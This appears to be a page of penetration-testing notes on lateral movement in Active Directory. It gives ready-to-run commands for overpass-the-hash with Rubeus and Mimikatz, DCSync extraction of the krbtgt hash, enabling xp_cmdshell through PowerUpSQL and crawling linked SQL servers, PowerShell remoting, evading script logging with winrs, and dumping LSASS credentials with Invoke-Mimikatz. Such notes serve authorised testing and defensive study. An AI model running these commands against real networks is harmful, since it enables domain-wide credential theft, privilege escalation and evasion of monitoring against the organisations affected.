Appearance
Lateral Movement ​
This section covers techniques for lateral movement in Active Directory environments.
Overpass the Hash ​
Overpass the Hash is a technique where the NTLM hash is used to obtain a Kerberos Ticket Granting Ticket (TGT). This TGT can then be used in a pass-the-ticket attack to request a service ticket, granting access to a targeted service via Kerberos.
You can use Rubeus to request and inject a TGT using a NTLM hash:
powershell
# Inject the TGT into memory
Rubeus.exe asktgt /user:<username> /rc4:<ntlm_hash> /ptt
# Run a new process (cmd.exe) with the TGT
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Alternatively, you can perform the same operation using Mimikatz:
powershell
sekurlsa::pth /user:<username> /domain:<domain> /rc4:<ntlm_hash> /run:cmd.exe
DCSync ​
DCSync is a technique that allows a user or system with replication rights to simulate the behavior of a Domain Controller and request credential data from Active Directory using Directory Replication Services (DRS). This includes password hashes for domain accounts, including the krbtgt
account and domain administrators.
To successfully perform DCSync, the account must have the following rights:
- Replicating Directory Changes
- Replicating Directory Changes All
These are typically granted to Administrators, Domain Admins and Enterprise Admins.
DCSync can be performed using Mimikatz, for example to extract the krbtgt hash:
powershell
lsadump::dcsync /domain:<domain> /user:krbtgt
The NTLM hash of the krbtgt account can be used to forge a Golden Ticket, which can be used to access any resource in the domain.
MSSQL Servers ​
Microsoft SQL (MSSQL) Servers are commonly deployed across Windows domains, making them valuable targets for lateral movement in a network. MSSQL Servers integrate with Active Directory by mapping domain users to database roles, leveraging AD trusts to enable access. This integration provides opportunities for lateral movement and privilege escalation.
The PowerUpSQL toolkit is a powerful resource for interacting with MSSQL Servers. It supports discovering SQL instances, auditing for weak configurations, escalating privileges, and performing advanced post-exploitation tasks.
To get started, import the PowerUpSQL module in PowerShell:
powershell
Import-Module .\PowerUpSQL.psd1
Enumerate MSSQL Servers ​
PowerUpSQL simplifies the process of identifying MSSQL instances within a domain. Use the following commands to enumerate and gather information:
powershell
Get-SQLInstanceDomain
Retrieve detailed server information:
powershell
Get-SQLInstanceDomain | Get-SQLServerInfo
Check if the current user has access to the SQL server:
powershell
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | SQLConnectionTestThreaded
Scan for misconfigurations and vulnerabilities
powershell
Invoke-SQLAudit -Instance mssql.example.local -Verbose
Execute SQL queries ​
Once access to an MSSQL Server is confirmed, you can execute SQL queries to gather information or manipulate the database. For example:
powershell
Get-SQLQuery -Query "SELECT system_user" -Instance mssql.example.local
Execute OS commands ​
MSSQL Servers can execute OS commands via the xp_cmdshell
feature, which is disabled by default. Enable it using the following command:
powershell
Get-SQLQuery -Query "EXEC sp_configure 'show advanced options',1;RECONFIGURE ;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE" -Instance mssql.example.local
Execute OS commands:
powershell
Get-SQLQuery -Query "EXEC xp_cmdshell 'whoami'" -Instance mssql.example.local
Database Links ​
Database links enable an MSSQL Server to connect to external data sources, such as other SQL Servers or OLE DB providers. Database links work even across forest trusts.
Enumerate database links from a target instance:
powershell
Get-SQLServerLink -Instance mssql.example.local -Verbose
Crawl all linked servers recursively:
powershell
Get-SQLServerLinkCrawl -Instance mssql.example.local
Execute a query across all linked servers (for example, run an OS command):
powershell
Get-SQLServerLinkCrawl -Instance mssql.example.local -Query "EXEC master..xp_cmdshell 'whoami'"
Use the -QueryTarget
parameter to specify the target server.
PowerShell Remoting ​
PowerShell Remoting (PSRemoting) is a feature in Windows PowerShell that allows you to run PowerShell commands or scripts on remote computers. It's built on Windows Remote Management (WinRM), which is a Microsoft implementation of the WS-Management protocol. It can be usefull for lateral movement in a domain environment.
Connect to a remote host ​
Maintain a persistent interactive session with a remote host, similar to SSH. To pass credentials, use the -Credential
parameter.
powershell
$session = New-PSSession -ComputerName <hostname>
Enter-PSSession -Session $session
powershell
$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('example\user', $Password)
$session = New-PSSession -ComputerName <hostname> -Credential $credential
Enter-PSSession -Session $session
Run commands on remote host ​
Execute commands on a remote host without an interactive session.
powershell
Invoke-Command -ComputerName <hostname> -ScriptBlock { Get-Process }
Run commands on multiple hosts ​
It is possible to run commands on multiple hosts by providing a list of hostnames.
powershell
Invoke-Command -ComputerName (Get-Content <list_of_servers>) -ScriptBlock { Get-Process }
Execute local script ​
Run a local script on a remote host.
powershell
Invoke-Command -ComputerName <hostname> -FilePath C:\scripts\Get-PassHashes.ps1
Run locally loaded function on remote host ​
To run a function defined in the local session on a remote host, use the ${function:<function_name>}
syntax.
powershell
Invoke-Command -ComputerName (Get-Content <list_of_servers>) -ScriptBlock ${function:Get-PassHashes}
Bypass Logging ​
PowerShell Remoting enforces system-wide transcription and script block logging, which can expose activity. To bypass this, winrs
can be used:
powershell
winrs -remote:<hostname> -u:<username> -p:<password> hostname
MimiKatz ​
Mimikatz is a post-exploitation tool that can be used to extract plaintext passwords, hashes and kerberos tickets from memory. It can also perform pass-the-hash, pass-the-ticket, and build Golden tickets.
Dump credentials on a local machine ​
The following methods can be used to extract credentials from LSASS's process memory on a local machine.
Invoke-Mimikatz is a PowerShell port of Mimikatz. Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory.
powershell
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'